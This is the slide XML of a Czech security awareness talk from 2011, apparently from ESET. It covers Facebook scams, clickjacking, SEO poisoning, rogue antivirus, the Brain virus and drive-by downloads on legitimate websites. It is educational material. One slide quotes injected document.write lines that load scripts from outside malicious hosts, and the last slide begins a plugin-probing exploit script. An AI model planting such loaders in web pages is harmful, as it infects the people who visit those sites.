      <a:lvl1pPr marL="179388" indent="-179388" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPts val="7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3pPr>
      <a:lvl4pPr marL="719138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4pPr>
      <a:lvl5pPr marL="898525" indent="-179388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SzPct val="100000"/>
        <a:buFont typeface="Arial" pitchFamily="34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97" r:id="rId5"/>
    <p:sldLayoutId id="2147484998" r:id="rId6"/>
    <p:sldLayoutId id="2147484999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-100">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Fedra Sans Alt Pro Medium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edra Sans Alt Pro Medium"/>
        </a:defRPr>
      </a:lvl9pPr>
      <a:extLst/>
    </p:titleStyle>
    <p:bodyStyle>
      <a:lvl1pPr marL="179388" indent="-179388" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPts val="7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200" kern="1200">
          <a:solidFill>
            <a:srgbClr val="D0D6DA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rgbClr val="D0D6DA"/>
        </a:buClr>
        <a:buSzPct val="100000"/>
        <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
        <a:buChar char="•"/>
        <a:defRPr sz="2200" kern="1200">
          <a:solidFill>
            <a:srgbClr val="D0D6DA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D0D6DA"/>
        </a:buClr>
        <a:buSzPct val="100000"/>
        <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
        <a:buChar char="•"/>
        <a:defRPr sz="2200" kern="1200">
          <a:solidFill>
            <a:srgbClr val="D0D6DA"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl3pPr>
      <a:lvl4pPr marL="719138" indent="-179388" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buClr>
          <a:srgbClr val="D0D6DA"/>
        </a:buClr>
        <a:buSzPct val="100000"/>
        <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
        <a:buChar char="•"/>
        <a:defRPr sz="2200" kern="1200">
          <a:solidFill>
            <a:srgbClr val="D0D6DA"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl4pPr>
      <a:lvl5pPr marL="898525" indent="-179388" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buClr>
          <a:srgbClr val="D0D6DA"/>
        </a:buClr>
        <a:buSzPct val="100000"/>
        <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
        <a:buChar char="•"/>
        <a:defRPr sz="2200" kern="1200">
          <a:solidFill>
            <a:srgbClr val="D0D6DA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Hav</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1" smtClean="0"/>
              <a:t>ěť</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t> 2011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Igor Hák, hak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2700" dirty="0" smtClean="0"/>
              <a:t>@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2700" dirty="0" err="1" smtClean="0"/>
              <a:t>eset.cz</a:t>
            </a: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-14232"/>
            <a:ext cx="6372200" cy="687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 rot="17076543">
            <a:off x="-836736" y="2914486"/>
            <a:ext cx="458234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Facebook</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, 2006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-1409"/>
            <a:ext cx="6372200" cy="68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 rot="17076543">
            <a:off x="-836736" y="2914486"/>
            <a:ext cx="458234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Facebook</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, 2007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-27053"/>
            <a:ext cx="6372200" cy="688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 rot="17076543">
            <a:off x="-1178406" y="2472346"/>
            <a:ext cx="5496169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Facebook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11/2009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929" y="1"/>
            <a:ext cx="6358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 rot="17076543">
            <a:off x="-1178406" y="2472346"/>
            <a:ext cx="5496169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Facebook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12/2009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-14233"/>
            <a:ext cx="6372201" cy="687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 rot="17076543">
            <a:off x="-1178406" y="2472346"/>
            <a:ext cx="5496169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Facebook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04/2010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594515"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1" smtClean="0"/>
              <a:t>Facebook</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t> dnes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="cs-CZ" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>ideální zdroj informací (podvodných i opravdových)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>ideální kanál pro šíření spamu, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1" smtClean="0"/>
              <a:t>hoaxů</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>, havěti...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>absolutní důvěra v inteligenci přátel</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>neznalost relativně nového prostředí</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="393192" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="cs-CZ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6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594515"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Clickjacking</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" b="1" dirty="0" smtClean="0"/>
              <a:t> na </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Facebooku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smtClean="0"/>
              <a:t>2008 – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1" smtClean="0"/>
              <a:t>webcam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1" smtClean="0"/>
              <a:t>clickjacking</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>dnes - velice účinné na „To se mi líbí“ s aplikací sociálního inženýrství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262874" cy="81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0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519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53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6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jiného soudku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594515"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Facebook</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" b="1" dirty="0" smtClean="0"/>
              <a:t> a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>clickjacking</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ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391089"/>
            <a:ext cx="9148192" cy="635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651276"/>
            <a:ext cx="1655043" cy="220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407633" y="3891053"/>
            <a:ext cx="576064" cy="5760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cs-CZ" sz="2700" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>1986</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2700" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>, Brain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2006, </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="cs-CZ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cs-CZ" sz="2700" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>SEO</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2700" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2700" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Poisoning</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" sz="2700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Drive-by </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="cs-CZ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cs-CZ" sz="2700" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Podvody na seznamkách </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2700" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>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998"/>
            <a:ext cx="9144000" cy="634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3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44001" cy="417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3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Soc. inženýrství: zneužití aktuálních témat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/>
              <a:t>zeměstřesení</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>tsunami...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superstar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571"/>
            <a:ext cx="9144000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604"/>
            <a:ext cx="9178078" cy="53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604"/>
            <a:ext cx="9178078" cy="53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604"/>
            <a:ext cx="9178078" cy="53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744"/>
            <a:ext cx="9144000" cy="51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744"/>
            <a:ext cx="9144000" cy="51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604"/>
            <a:ext cx="9178078" cy="53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1986, virus Brain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311835" cy="534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220"/>
            <a:ext cx="9144000" cy="531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220"/>
            <a:ext cx="9144000" cy="531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4" y="1527325"/>
            <a:ext cx="7647183" cy="50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720725" y="428625"/>
            <a:ext cx="77724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990"/>
            <a:ext cx="6768752" cy="654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860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 konci řetězce se nachází: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nic (pouze se nám to bude „líbit“)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="109728" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="cs-CZ" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>vysněné video</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="cs-CZ" dirty="0" smtClean="0">
              <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>webová stránka zvyšující si návštěvnost lidskou blbostí</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="cs-CZ" dirty="0">
              <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>podvodná(?) webová stránka tahající z lidí </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>peníze</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>hav</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>ěť</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" dirty="0" smtClean="0">
              <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="cs-CZ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63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3"/>
            <a:ext cx="6948264" cy="57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160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62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" y="341537"/>
            <a:ext cx="9135616" cy="625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144001" cy="62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1986, virus Brain</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" dirty="0"/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Welcome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Dungeon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t> ©</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>1986 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Basit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t> * </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Amjad</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1" smtClean="0"/>
              <a:t>pvt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>) Ltd. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1" smtClean="0"/>
              <a:t>BRAIN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730 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>NIZAM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BLOCK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ALLAMA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IQBAL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TOWN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LAHORE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1" smtClean="0"/>
              <a:t>PAKISTAN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cs-CZ" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PHONE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: 430791,443248,280530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Beware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VIRUS....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vaccination</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="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SEO</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1" smtClean="0"/>
              <a:t>Poisoning</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" dirty="0"/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eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="cs-CZ" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>Z</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>neužití v tu chvíli aktuálních témat a podchycení klíčových slov na vyhledávači (typicky </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1" smtClean="0"/>
              <a:t>google</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="cs-CZ" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>N</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1" smtClean="0"/>
              <a:t>ěkolik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t> tváří - hrátky s HTTP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1" smtClean="0"/>
              <a:t>referrer</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" dirty="0" smtClean="0"/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verze pro vyhledávač </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1" smtClean="0"/>
              <a:t>google</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1" smtClean="0"/>
              <a:t>doorway</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1" smtClean="0"/>
              <a:t>page</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r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verze pro přímý vstup uživatele na stránku</a:t>
            </a:r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verze pro vstup uživatele z výsledků </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1" smtClean="0"/>
              <a:t>google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5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Rogue antivirus / antispyware</a:t>
            </a:r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1159605"/>
            <a:ext cx="7668344" cy="569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07524" name="Picture 4" descr="http://www.spywarewarrior.com/pics/smartsec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857250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0" y="332656"/>
            <a:ext cx="2857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50" y="1628800"/>
            <a:ext cx="28384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996952"/>
            <a:ext cx="2819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0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09550"/>
            <a:ext cx="844867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Havěť na LEGITIMNÍCH stránkách</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" dirty="0"/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drive-by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>downloads</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t> - „mimochodný </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1" smtClean="0"/>
              <a:t>download</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>“</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="cs-CZ" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>padá tvrzení, že havěť číhá na „šedé zóně“</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="cs-CZ" dirty="0" smtClean="0">
              <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="cs-CZ" b="1" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>trust </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" b="1" dirty="0" err="1" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>phenomenom</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" b="1" dirty="0" smtClean="0">
              <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="cs-CZ" dirty="0" smtClean="0">
              <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>„na tu stránku koukám 5 let, jde o poplach antiviru!“</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="cs-CZ" dirty="0">
              <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="cs-CZ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18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Havěť na LEGITIMNÍCH stránkách</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" dirty="0"/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cs-CZ" dirty="0"/>
              <a:t>http://www.onlinovehry.cz/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http://www.aservistatra.cz/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http://www.ukazsex.cz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ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05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7396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Havěť na LEGITIMNÍCH stránkách</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" dirty="0"/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5863"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="cs-CZ" smtClean="0"/>
              <a:t>HTML kód (obvykle jeho konec): iframe nebo javaskript</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ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564904"/>
            <a:ext cx="8358187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1986, virus Brain</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" dirty="0"/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/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>2011, 25 let pot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>é</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1" smtClean="0"/>
              <a:t>Brain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1" smtClean="0"/>
              <a:t>Telecommunication</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t> Ltd. na stejné adrese</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>!</a:t>
            </a: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04452"/>
            <a:ext cx="9144000" cy="428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Havěť na LEGITIMNÍCH stránkách</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" dirty="0"/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5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i="1" dirty="0"/>
              <a:t>document.write('&lt;script src=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" i="1" dirty="0"/>
              <a:t>http://tetasperu.pe/wordpress/video11.php </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0"/>
              <a:t>&gt;&lt;\/script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0" smtClean="0"/>
              <a:t>&gt;');</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0" smtClean="0"/>
              <a:t>document.write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0"/>
              <a:t>('&lt;script src=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" i="1" dirty="0"/>
              <a:t>http://sampoong.co.kr/admin/SMALL_UPDIR/index.php </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0"/>
              <a:t>&gt;&lt;\/script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0" smtClean="0"/>
              <a:t>&gt;');</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0" smtClean="0"/>
              <a:t>document.write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0"/>
              <a:t>('&lt;script src=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" i="1" dirty="0"/>
              <a:t>http://worphueser.de/032c0698b3108c214/032c0698b31084b13.php </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0"/>
              <a:t>&gt;&lt;\/script&gt;');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9758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mtClean="0"/>
              <a:t>Havěť na LEGITIMNÍCH stránkách</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" dirty="0"/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566863"/>
            <a:ext cx="625475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Havěť na LEGITIMNÍCH stránkách</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1167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/>
            <a:r>
              <a:rPr lang="cs-CZ" b="1" smtClean="0"/>
              <a:t>Nutno aktualizovat i věci okolo prohlížeče</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" b="1" dirty="0" smtClean="0"/>
              <a:t>!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="cs-CZ" smtClean="0"/>
              <a:t>Adobe Acrobat Reader</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="cs-CZ" smtClean="0"/>
              <a:t>Adobe Flash Player</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="cs-CZ" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2000" dirty="0" smtClean="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2000" err="1" smtClean="0"/>
              <a:t>script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2000" smtClean="0"/>
              <a:t>&gt; function pdfswf() { try { for(i = 0; i &lt;= navigator.plugins.length; i++) { name = navigator.plugins[i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2000" dirty="0" smtClean="0"/>
              <a:t>].</a:t>
            </a:r>
            <a:r>
